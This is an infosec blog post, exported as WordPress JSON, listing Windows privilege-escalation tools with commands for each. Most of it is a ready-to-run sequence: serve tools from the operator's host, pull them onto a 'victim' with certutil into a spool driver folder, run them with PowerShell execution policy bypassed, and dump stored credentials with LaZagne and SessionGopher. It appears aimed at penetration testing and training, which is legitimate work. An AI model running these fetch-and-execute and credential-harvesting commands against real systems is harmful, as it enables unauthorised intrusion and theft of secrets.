{"id":2195,"date":"2021-01-09T17:10:19","date_gmt":"2021-01-09T16:10:19","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2195"},"modified":"2023-12-20T21:32:42","modified_gmt":"2023-12-20T20:32:42","slug":"windows-privilege-escalation-scripts","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2195","title":{"rendered":"Windows privilege escalation scripts"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Pre\u00adpare the own system:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">cd p151.general.1\/scripts\/privesc\/windows\npython -m SimpleHTTPServer 80<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Pre\u00adpare the target:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">set NTPSRV=$ownIp\nmkdir C:\\Windows\\System32\\spool\\drivers\\color\\wsc\ncd C:\\Windows\\System32\\spool\\drivers\\color\\wsc<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Down\u00adload most scripts at once (&gt;30&nbsp;<span class=\"caps\">MB<\/span>!):<\/p>\n\n\n\n<pre id=\"block-aa01072a-d244-4001-8cd8-c1a695526bf8\" class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/7za.exe\ncertutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/_ex.zip\n7za.exe x _ex.zip<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">WinPeas<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/carlospolop\/privilege-escalation-awesome-scripts-suite\">Github<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">winPEAS.bat<br>winPEASx86.exe<br>winPEASx64.exe<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Powerless<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/M4ximuss\/Powerless\">Github<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/Powerless.bat\" Powerless.bat\nPowerless.bat<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Windows Exploit Suggester <span class=\"caps\">NG<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/bitsadmin\/wesng\">Github<\/a> (<a href=\"https:\/\/github.com\/AonCyberLabs\/Windows-Exploit-Suggester\">Old ver\u00adsion for old sys\u00adtems<\/a>)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On the vic\u00adtim, exe\u00adcute <code>systeminfo<\/code> and save its out\u00adput on the local sys\u00adtem.&nbsp;Then:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li><code>python3 wes.py --update<\/code><\/li><li><code>python3 wes.py \/tmp\/systeminfo<\/code><\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">WinPWN<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/S3cur3Th1sSh1t\/WinPwn\">Github<\/a><\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Update the repo first<br><code>cd \/opt\/WinPwn &amp;&amp; git pull &amp;&amp; python -m SimpleHTTPServer 80<\/code><\/li><li>On the tar\u00adget:<br><code>certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/Offline_WinPwn.ps1\" Offline_WinPwn.ps1<\/code><\/li><li>Exe\u00adcute:<br><code>powershell -exec bypass<br>Import-Module .\\Offline_Winpwn.ps1<br>WinPwn<\/code><br>or<br><code>powershell.exe -ExecutionPolicy ByPass -command \"&amp; { . Import-Module .\\Offline_Winpwn.ps1; WinPwn }\"<\/code><\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Sherlock<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/rasta-mouse\/Sherlock\">Github<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">JAWS<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/411Hall\/JAWS\">Github<\/a><\/p>\n\n\n\n<pre id=\"block-9c3fc78a-9a40-4ece-b00d-a961b45dd919\" class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/jaws-enum.ps1\" jaws-enum.ps1\npowershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">PowerSploit \/ PowerUp<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1284\">See the blog post for&nbsp;it.<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">If Pow\u00ader\u00adshell is not avail\u00adable. use <a href=\"https:\/\/github.com\/GhostPack\/SharpUp\">SharpUp<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">BeRoot<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/AlessandroZ\/BeRoot\">Github<\/a><\/p>\n\n\n\n<pre id=\"block-a8ceacb9-8046-4ce9-8c42-6756d6878b8a\" class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/beRoot.exe\" beRoot.exe\nbeRoot.exe<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Seatbelt<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/seatbelt.exe\" seatbelt.exe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">See <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1797\" data-type=\"post\" data-id=\"1797\">the Seat\u00adbelt post<\/a> for more details.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">FullPowers<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/itm4n\/FullPowers\">Github<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Works only for users with <em>*\/local ser\u00advice<\/em> or <em>*\/network ser\u00advice<\/em> (check <code>whoami<\/code> out\u00adput) Opens a new shell with all ser\u00advice priv\u00adi\u00adleges&nbsp;set.<\/p>\n\n\n\n<pre id=\"block-2c0218aa-605e-4b7d-95ec-4fc3f1347f0d\" class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/FullPowers.exe\" FullPowers.exe\nFullPowers.exe<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Retrieving credentials<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">LaZagne<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/AlessandroZ\/LaZagne\">Github<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Retrieves many cre\u00adden\u00adtials from var\u00adi\u00adous software.<\/p>\n\n\n\n<pre id=\"block-47a37765-e530-457d-8ab9-762a143a2401\" class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/laZagne.exe\" laZagne.exe\nlaZagne.exe all<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">SessionGopher<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/fireeye\/SessionGopher\">Github<\/a><\/p>\n\n\n\n<pre id=\"block-16d7d4f5-d6a0-43c4-b95b-5cea937ca4a7\" class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/SessionGopher.ps1\" SessionGopher.ps1\npowershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"&amp; { . .\\SessionGopher.ps1; Invoke-SessionGopher -Thorough}\"<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Older scripts for older systems<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/pentestmonkey\/windows-privesc-check\">win\u00addows-privesc-check<\/a><\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pre\u00adpare the own sys\u00adtem: cd p151.general.1\/scripts\/privesc\/windows python \u2011m Sim\u00adple\u00adHTTPServ\u00ader 80 Pre\u00adpare the tar\u00adget: set <span class=\"caps\">NTPSRV<\/span>=$ownIp mkdir C:\\Windows\\System32\\spool\\drivers\\color\\wsc cd C:\\Windows\\System32\\spool\\drivers\\color\\wsc Down\u00adload most scripts at once (&gt;30&nbsp;<span class=\"caps\">MB<\/span>!): certutil.exe \u2011url\u00adcache \u2011split \u2011f \u201chttp:\/\/$<span class=\"caps\">NTPSRV<\/span>\/7za.exe certutil.exe \u2011url\u00adcache \u2011split \u2011f \u201chttp:\/\/$<span class=\"caps\">NTPSRV<\/span>\/_ex.zip 7za.exe x _ex.zip Win\u00adPeas Github winPEAS.batwinPEASx86.exewinPEASx64.exe Pow\u00ader\u00adless Github certutil.exe \u2011url\u00adcache \u2011split \u2011f \u201chttp:\/\/$<span class=\"caps\">NTPSRV<\/span>\/Powerless.bat\u201d Powerless.bat Powerless.bat Win\u00addows Exploit Sug\u00adgester <span class=\"caps\">NG<\/span> Github&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471,483],"tags":[24],"class_list":["post-2195","post","type-post","status-publish","format-standard","hentry","category-privesc","category-howtos","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2195"}],"version-history":[{"count":18,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2195\/revisions"}],"predecessor-version":[{"id":3227,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2195\/revisions\/3227"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}